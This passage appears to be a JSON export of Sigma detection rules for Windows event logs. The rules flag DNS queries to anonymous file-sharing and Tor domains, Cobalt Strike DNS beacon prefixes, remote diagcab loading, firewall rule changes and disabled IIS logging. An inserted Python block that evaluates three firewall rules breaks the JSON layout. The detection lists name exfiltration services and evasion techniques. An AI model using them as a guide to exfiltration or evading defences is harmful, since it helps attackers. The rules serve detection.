 FileNameBuffer:\n            - 'system32\\drivers\\vsock.sys'\n            - 'System32\\drivers\\vmci.sys'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml",
    "content": "title: Loading Diagcab Package From Remote Path\nid: 50cb47b8-2c33-4b23-a2e9-4600657d9746\nstatus: test\ndescription: Detects loading of diagcab packages from a remote path, as seen in the DogWalk vulnerability\nreferences:\n    - https://twitter.com/nas_bench/status/1539679555908141061\n    - https://twitter.com/j00sean/status/1537750439701225472\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: diagnosis-scripted\ndetection:\n    selection:\n        EventID: 101\n        PackagePath|contains: '\\\\\\\\' # Example would be: \\\\webdav-test.herokuapp.com@ssl\\DavWWWRoot\\package\n    condition: selection\nfalsepositives:\n    - Legitimate package hosted on a known and authorized remote location\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml",
    "content": "title: DNS Query for Anonfiles.com Domain - DNS Client\nid: 29f171d7-aa47-42c7-9c7b-3c87938164d9\nrelated:\n    - id: 065cceea-77ec-4030-9052-fc0affea7110\n      type: similar\nstatus: test\ndescription: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes\nreferences:\n    - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains: '.anonfiles.com'\n    condition: selection\nfalsepositives:\n    - Rare legitimate access to anonfiles.com\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_mal_cobaltstrike.yml",
    "content": "title: Suspicious Cobalt Strike DNS Beaconing - DNS Client\nid: 0d18728b-f5bf-4381-9dcf-915539fff6c2\nrelated:\n    - id: f356a9c4-effd-4608-bbf8-408afd5cd006\n      type: similar\nstatus: test\ndescription: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons\nreferences:\n    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\n    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.t1071.004\n    - attack.command-and-control\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection_eid:\n        EventID: 3008\n    selection_query_1:\n        QueryName|startswith:\n            - 'aaa.stage.'\n            - 'post.1'\n    selection_query_2:\n        QueryName|contains: '.stage.123456.'\n    condition: selection_eid and 1 of selection_query_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml",
    "content": "title: DNS Query To MEGA Hosting Website - DNS Client\nid: 66474410-b883-415f-9f8d-75345a0a66a6\nrelated:\n    - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3\n      type: similar\nstatus: test\ndescription: Detects DNS queries for subdomains related to MEGA sharing website\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains: 'userstorage.mega.co.nz'\n    condition: selection\nfalsepositives:\n    - Legitimate DNS queries and usage of Mega\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_put_io.yml",
    "content": "title: DNS Query To Put.io - DNS Client\nid: 8b69fd42-9dad-4674-abef-7fdef43ef92a\nstatus: test\ndescription: Detects DNS queries for subdomains related to \"Put.io\" sharing website.\nreferences:\n    - https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-23\ntags:\n    - attack.command-and-control\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains:\n            - 'api.put.io'\n            - 'upload.put.io'\n    condition: selection\nfalsepositives:\n    - Legitimate DNS queries and usage of Put.io\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml",
    "content": "title: Query Tor Onion Address - DNS Client\nid: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2\nrelated:\n    - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544\n      type: similar\n    - id: a8322756-015c-42e7-afb1-436e85ed3ff5\n      type: similar\nstatus: test\ndescription: Detects DNS resolution of an .onion address related to Tor routing networks\nreferences:\n    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-20\nmodified: 2025-09-12\ntags:\n    - attack.command-and-control\n    - attack.t1090.003\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|endswith:\n            - '.hiddenservice.net'\n            - '.onion.ca'\n            - '.onion.cab'\n            - '.onion.casa'\n            - '.onion.city'\n            - '.onion.direct'\n            - '.onion.dog'\n            - '.onion.glass'\n            - '.onion.gq'\n            - '.onion.guide'\n            - '.onion.in.net'\n            - '.onion.ink'\n            - '.onion.it'\n            - '.onion.link'\n            - '.onion.lt'\n            - '.onion.lu'\n            - '.onion.ly'\n            - '.onion.mn'\n            - '.onion.network'\n            - '.onion.nu'\n            - '.onion.pet'\n            - '.onion.plus'\n            - '.onion.pt'\n            - '.onion.pw'\n            - '.onion.rip'\n            - '.onion.sh'\n            - '.onion.si'\n            - '.onion.to'\n            - '.onion.top'\n            - '.onion.ws'\n            - '.onion'\n            - '.s1.tor-gateways.de'\n            - '.s2.tor-gateways.de'\n            - 
'.s3.tor-gateways.de'\n            - '.s4.tor-gateways.de'\n            - '.s5.tor-gateways.de'\n            - '.t2w.pw'\n            - '.tor2web.ae.org'\n            - '.tor2web.blutmagie.de'\n            - '.tor2web.com'\n            - '.tor2web.fi'\n            - '.tor2web.io'\n            - '.tor2web.org'\n            - '.tor2web.xyz'\n            - '.torlink.co'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml",
    "content": "title: DNS Query To Ufile.io - DNS Client\nid: 090ffaad-c01a-4879-850c-6d57da98452d\nrelated:\n    - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b\n      type: similar\nstatus: test\ndescription: Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    service: dns-client\n    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'\ndetection:\n    selection:\n        EventID: 3008\n        QueryName|contains: 'ufile.io'\n    condition: selection\nfalsepositives:\n    - DNS queries for \"ufile\" are not necessarily malicious by nature. Investigate the source to determine the necessary actions to take\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml",
    "content": "title: Failed DNS Zone Transfer\nid: 6d444368-6da1-43fe-b2fc-44202430480e\nstatus: test\ndescription: Detects when a DNS zone transfer failed.\nreferences:\n    - https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp\nauthor: Zach Mathis\ndate: 2023-05-24\ntags:\n    - attack.reconnaissance\n    - attack.t1590.002\nlogsource:\n    product: windows\n    service: dns-server\ndetection:\n    selection:\n        EventID: 6004 # The DNS server received a zone transfer request from %1 for a non-existent or non-authoritative zone %2.\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml",
    "content": "title: DNS Server Error Failed Loading the ServerLevelPluginDLL\nid: cbe51394-cd93-4473-b555-edf0144952d9\nrelated:\n    - id: e61e8a88-59a9-451c-874e-70fcc9740d67\n      type: derived\n    - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573\n      type: derived\nstatus: test\ndescription: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded\nreferences:\n    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\n    - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx\n    - https://twitter.com/gentilkiwi/status/861641945944391680\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-08\nmodified: 2023-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: dns-server\ndetection:\n    selection:\n        EventID:\n            - 150\n            - 770\n            - 771\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml",
    "content": "title: USB Device Plugged\nid: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4\nstatus: test\ndescription: Detects plugged/unplugged USB devices\nreferences:\n    - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/\n    - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-09\nmodified: 2021-11-30\ntags:\n    - attack.initial-access\n    - attack.t1200\nlogsource:\n    product: windows\n    service: driver-framework\n    definition: 'Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational eventlog'\ndetection:\n    selection:\n        EventID:\n            - 2003  # Loading drivers\n            - 2100  # Pnp or power management\n            - 2102  # Pnp or power management\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml",
    "content": "title: Uncommon New Firewall Rule Added In Windows Firewall Exception List\nid: cde0a575-7d3d-4a49-9817-b8004a7bf105\nstatus: test\ndescription: Detects when a rule has been added to the Windows Firewall exception list\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2025-10-08\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2004 # A rule has been added to the Windows Defender Firewall exception list\n            - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)\n            - 2097\n    filter_main_block:\n        Action: 2 # Block\n    filter_main_generic:\n        ApplicationPath|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_main_covered_paths:\n        # This filter is added to avoid duplicate alerting from 9e2575e7-2cb9-4da1-adc8-ed94221dca5e\n        ApplicationPath|contains:\n            - 'C:\\PerfLogs\\'\n            - 'C:\\Temp\\'\n            - 'C:\\Tmp\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Tasks\\'\n            - 'C:\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    filter_main_system_dllhost:\n        ApplicationPath: 'System'\n        ModifyingApplication: 'C:\\Windows\\System32\\dllhost.exe'\n    filter_main_tiworker:\n        ModifyingApplication|startswith: 'C:\\Windows\\WinSxS\\'\n        ModifyingApplication|endswith: '\\TiWorker.exe'\n    filter_main_null:\n        ApplicationPath: null\n    filter_optional_no_path:\n        # This filter filters a lot of FPs related to Windows Services\n        
ModifyingApplication:\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\System32\\dllhost.exe'\n        ApplicationPath: ''\n    filter_optional_msmpeng:\n        - ModifyingApplication|startswith:\n              - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n              - 'C:\\Program Files\\Windows Defender\\'\n          ModifyingApplication|endswith: '\\MsMpEng.exe'\n        - ApplicationPath|startswith:\n              - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n              - 'C:\\Program Files\\Windows Defender\\'\n          ApplicationPath|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml",
    "content": "title: New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application\nid: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e\nrelated:\n    - id: cde0a575-7d3d-4a49-9817-b8004a7bf105\n      type: derived\nstatus: test\ndescription: Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\n    - https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#\nauthor: frack113\ndate: 2023-02-26\nmodified: 2024-05-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10)\n            - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)\n            - 2097\n        ApplicationPath|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    filter_main_block:\n        Action: 2 # Block\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_wmiprvse.yml",
    "content": "title: New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE\nid: eca81e8d-09e1-4d04-8614-c91f44fd0519\nstatus: test\ndescription: |\n    Detects the addition of a new \"Allow\" firewall rule by the WMI process (WmiPrvSE.EXE).\n    This can occur if an attacker leverages PowerShell cmdlets such as \"New-NetFirewallRule\", or directly uses WMI CIM classes such as \"MSFT_NetFirewallRule\".\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\n    - https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\n    - https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-05-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2004 # A rule has been added to the Windows Defender Firewall exception list\n            - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)\n            - 2097\n        Action: 3 # Allow\n        ModifyingApplication|endswith: ':\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n    condition: selection\nfalsepositives:\n    - Administrator scripts or activity.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml",
    "content": "title: All Rules Have Been Deleted From The Windows Firewall Configuration\nid: 79609c82-a488-426e-abcf-9f341a39365d\nstatus: test\ndescription: Detects when all the rules have been deleted from the Windows Defender Firewall configuration\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-17\nmodified: 2024-01-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2033 # All rules have been deleted from the Windows Defender Firewall configuration on this computer\n            - 2059 # All rules have been deleted from the Windows Defender Firewall configuration on this computer. (Windows 11)\n    filter_main_svchost:\n        ModifyingApplication|endswith: ':\\Windows\\System32\\svchost.exe'\n    filter_optional_msmpeng:\n        ModifyingApplication|contains|all:\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml",
    "content": "title: A Rule Has Been Deleted From The Windows Firewall Exception List\nid: c187c075-bb3e-4c62-b4fa-beae0ffc211f\nstatus: test\ndescription: Detects when a rule has been deleted from the Windows Defender Firewall exception list\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2024-08-29\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2006 # A rule has been deleted in the Windows Defender Firewall exception list\n            - 2052 # A rule has been deleted in the Windows Defender Firewall exception list. (Windows 11)\n    filter_main_generic:\n        ModifyingApplication|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_main_svchost:\n        ModifyingApplication: 'C:\\Windows\\System32\\svchost.exe'\n    filter_optional_msmpeng:\n        ModifyingApplication|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        ModifyingApplication|endswith: '\\MsMpEng.exe'\n    filter_main_null:\n        ModifyingApplication: null\n    filter_main_empty:\n        ModifyingApplication: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nlevel: medium\n"
  },
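The firewall_as rules above share one evaluation pattern: a `selection` that must hold, minus a set of `filter_main_*` (and `filter_optional_*`) exclusions. The block below is an added example, not code from the Sigma project or its compiler: it ports three of those rules (suspicious-location exception, allow rule added via WmiPrvSE.EXE, single-rule deletion) to plain Python and runs them over constructed firewall events. Field names follow the rules; the events, paths and the user name `bob` are made up. It shows two details a hand port has to get right: Sigma string matching is case-insensitive, and the `filter_main_null`/`filter_main_empty` exclusions in the deletion rule mean an event whose `ModifyingApplication` field never reached the SIEM is silently suppressed.

```python
"""Added example (not code from the Sigma project): evaluate the firewall_as
rules above over constructed events. Field names mirror the rules; the
sample events are constructed, not captured logs."""

# Values copied from the rules above.
ADD_RULE_EVENT_IDS = {2004, 2071, 2097}        # rule added to the exception list
DELETE_RULE_EVENT_IDS = {2006, 2052}           # a single rule deleted
ACTION_BLOCK, ACTION_ALLOW = 2, 3              # Firewall "Action" field values

SUSPICIOUS_APP_PATHS = (
    ":\\PerfLogs\\", ":\\Temp\\", ":\\Tmp\\", ":\\Users\\Public\\",
    ":\\Windows\\Tasks\\", ":\\Windows\\Temp\\", "\\AppData\\Local\\Temp\\",
)
TRUSTED_PREFIXES = ("C:\\Program Files (x86)\\", "C:\\Program Files\\", "C:\\Windows\\WinSxS\\")
DEFENDER_PLATFORM = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\"


# Sigma string comparisons are case-insensitive; a missing field never matches.
def _contains(value, needles):
    return value is not None and any(n.lower() in value.lower() for n in needles)


def _startswith(value, prefixes):
    return value is not None and value.lower().startswith(tuple(p.lower() for p in prefixes))


def _endswith(value, suffixes):
    return value is not None and value.lower().endswith(tuple(s.lower() for s in suffixes))


def rule_susp_location_added(ev):
    """New Firewall Rule Added ... For Potential Suspicious Application."""
    selection = (ev.get("EventID") in ADD_RULE_EVENT_IDS
                 and _contains(ev.get("ApplicationPath"), SUSPICIOUS_APP_PATHS))
    filter_main_block = ev.get("Action") == ACTION_BLOCK   # a *block* rule is not an exception
    return selection and not filter_main_block


def rule_wmiprvse_allow(ev):
    """New Firewall Rule Added ... Via WmiPrvSE.EXE (New-NetFirewallRule goes through WMI)."""
    return (ev.get("EventID") in ADD_RULE_EVENT_IDS
            and ev.get("Action") == ACTION_ALLOW
            and _endswith(ev.get("ModifyingApplication"), (":\\Windows\\System32\\wbem\\WmiPrvSE.exe",)))


def rule_rule_deleted(ev):
    """A Rule Has Been Deleted From The Windows Firewall Exception List."""
    if ev.get("EventID") not in DELETE_RULE_EVENT_IDS:
        return False
    app = ev.get("ModifyingApplication")
    filters = [
        _startswith(app, TRUSTED_PREFIXES),                                          # filter_main_generic
        app is not None and app.lower() == "c:\\windows\\system32\\svchost.exe",    # filter_main_svchost
        _startswith(app, (DEFENDER_PLATFORM,)) and _endswith(app, ("\\MsMpEng.exe",)),  # filter_optional_msmpeng
        app is None,                                                                 # filter_main_null
        app == "",                                                                   # filter_main_empty
    ]
    return not any(filters)


RULES = {
    "susp_location_added": rule_susp_location_added,
    "wmiprvse_allow": rule_wmiprvse_allow,
    "rule_deleted": rule_rule_deleted,
}

# Constructed sample events (not captured logs). Keys mirror the rule fields.
SAMPLE_EVENTS = [
    {"EventID": 2004, "Action": 3, "ApplicationPath": "C:\\Users\\Public\\svc.exe",
     "ModifyingApplication": "C:\\Windows\\System32\\netsh.exe"},                   # 0: allow rule for Public -> hit
    {"EventID": 2004, "Action": 2, "ApplicationPath": "C:\\Users\\Public\\svc.exe",
     "ModifyingApplication": "C:\\Windows\\System32\\netsh.exe"},                   # 1: block rule -> suppressed
    {"EventID": 2071, "Action": 3, "ApplicationPath": "c:\\users\\bob\\appdata\\local\\temp\\x.exe",
     "ModifyingApplication": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},          # 2: lower-case path, via WMI -> both add rules
    {"EventID": 2004, "Action": 3, "ApplicationPath": "C:\\Program Files\\Vendor\\app.exe",
     "ModifyingApplication": "C:\\Program Files\\Vendor\\setup.exe"},               # 3: benign install -> nothing
    {"EventID": 2006, "ModifyingApplication": "C:\\Users\\bob\\AppData\\Local\\Temp\\tool.exe"},  # 4: deletion by odd binary -> hit
    {"EventID": 2052, "ModifyingApplication": "C:\\Windows\\System32\\svchost.exe"},  # 5: service host -> filtered
    {"EventID": 2006},                                                              # 6: field missing -> filter_main_null
]


def run_rules(events):
    """Return {rule_name: [indices of matching events]}."""
    return {name: [i for i, ev in enumerate(events) if fn(ev)] for name, fn in RULES.items()}


if __name__ == "__main__":
    for name, hits in run_rules(SAMPLE_EVENTS).items():
        print(f"{name}: {hits}")
```

Run it directly to print the matching indices per rule. The `Action` value (2 block, 3 allow) is what keeps a block rule for a Temp binary from being reported as an exception, and event 6 is the case to watch in your own pipeline: if the collector drops `ModifyingApplication`, the deletion rule goes quiet rather than noisy.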
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml",
    "content": "title: The Windows Defender Firewall Service Failed To Load Group Policy\nid: 7ec15688-fd24-4177-ba43-1a950537ee39\nstatus: test\ndescription: Detects when the Windows Defender Firewall service failed to load Group Policy\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2023-01-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID: 2009 # The Windows Defender Firewall service failed to load Group Policy\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml",
    "content": "title: Windows Defender Firewall Has Been Reset To Its Default Configuration\nid: 04b60639-39c0-412a-9fbe-e82499c881a3\nstatus: test\ndescription: Detects activity when Windows Defender Firewall has been reset to its default configuration\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2023-04-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2032 # Windows Defender Firewall has been reset to its default configuration\n            - 2060 # Windows Defender Firewall has been reset to its default configuration. (Windows 11)\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml",
    "content": "title: Windows Firewall Settings Have Been Changed\nid: 00bb5bd5-1379-4fcf-a965-a5b6f7478064\nstatus: test\ndescription: Detects activity when the settings of the Windows firewall have been changed\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-19\nmodified: 2023-04-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2002 # A Windows Defender Firewall setting has changed.\n            - 2083 # A Windows Defender Firewall setting has changed. (Windows 11)\n            - 2003 # A Windows Firewall setting in the profile has changed\n            - 2082 # A Windows Defender Firewall setting in the %1 profile has changed. (Windows 11)\n            - 2008  # Windows Firewall Group Policy settings have changed. The new settings have been applied\n            # - 2010  # Network profile changed on an interface.\n    condition: selection\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_logging_etw_disabled.yml",
    "content": "title: ETW Logging/Processing Option Disabled On IIS Server\nid: a5b40a90-baf5-4bf7-a6f7-373494881d22\nstatus: test\ndescription: Detects changes to the IIS server configuration that disable or remove the ETW logging/processing option.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/\nauthor: frack113, Nasreddine Bencherchali\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration|endswith: '@logTargetW3C'\n        OldValue|contains: 'ETW'\n    filter_main_etw_added:\n        NewValue|contains: 'ETW'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_logging_http_disabled.yml",
    "content": "title: HTTP Logging Disabled On IIS Server\nid: e8ebd53a-30c2-45bd-81bb-74befba07bdb\nstatus: test\ndescription: Detects changes to the IIS server configuration that disable HTTP logging for successful requests.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging\nauthor: frack113\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration: '/system.webServer/httpLogging/@dontLog'\n        NewValue: 'true'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_module_added.yml",
    "content": "title: New Module Added To IIS Server\nid: dd857d3e-0c6e-457b-9b48-e82ae7f86bd7\nstatus: test\ndescription: Detects the addition of a new module to an IIS server.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\n    - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview\nauthor: frack113\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration|contains: '/system.webServer/modules/add'\n    filter_main_builtin:\n        NewValue:\n            - 'AnonymousAuthenticationModule'\n            - 'CustomErrorModule'\n            - 'DefaultDocumentModule'\n         